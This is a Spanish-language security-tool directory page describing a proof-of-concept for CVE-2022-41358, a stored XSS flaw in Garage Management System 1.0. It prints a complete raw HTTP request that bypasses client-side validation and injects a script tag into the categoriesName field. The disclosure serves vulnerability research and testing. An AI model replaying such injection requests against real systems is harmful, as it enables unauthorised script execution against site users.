Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/thecasual/cve-2022-41358
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubthecasual/cve-2022-41358

CVE-2022-41358

Exploit de prueba de concepto para CVE-2022-41358 que demuestra XSS almacenado en Garage Management System 1.0 mediante la manipulación de solicitudes de Burp Suite para eludir la validación del lado del cliente.

Ver Repositorio
2hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Título del Exploit: Garage Management System 1.0 - 'categoriesName' - XSS Almacenado

Autor del Exploit: Sam Wallace

Enlace del Software: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html

Versión: 1.0

Probado en: Debian

ID: CVE-2022-41358

 

Resumen:

Garage Management System utiliza validación del lado del cliente para prevenir XSS. Usando Burp, se puede modificar y reenviar una solicitud al servidor, omitiendo esta validación, lo que crea una vía para XSS.

 

Cuando los mensajes sugieren que se está realizando la validación, este es un buen momento para verificar que estas comprobaciones también se están realizando del lado del servidor.

Alt text

 

Esta es la solicitud antes de cualquier modificación en Burp.

Alt text

 

Realice una modificación rápida en Burp...

Alt text

 

¡Beneficio!

Alt text

 

Prueba

Alt text

POC

root@kitploit:~
Parameter: categoriesName
URI: /garage/php_action/createCategories.php
root@kitploit:~
Host: 10.24.0.69
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.24.0.69
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqKDsN4gmatTEEkhS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.24.0.69/garage/add-category.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=gbklvcv3vvv987636urv0gg53u
Connection: close

------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="categoriesName"

<script>alert(1)</script>
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="categoriesStatus"

1
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="create"


------WebKitFormBoundaryqKDsN4gmatTEEkhS--


![Alt text](https://assets.kitploit.com/production/public/readmes/33421/62c2bf87d935c7a05de7ab8f4aaa6d890f63aa3462e00f52cf81f9a74892a9a7.png "Optional title")

Referencia:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41358

Descargar herramienta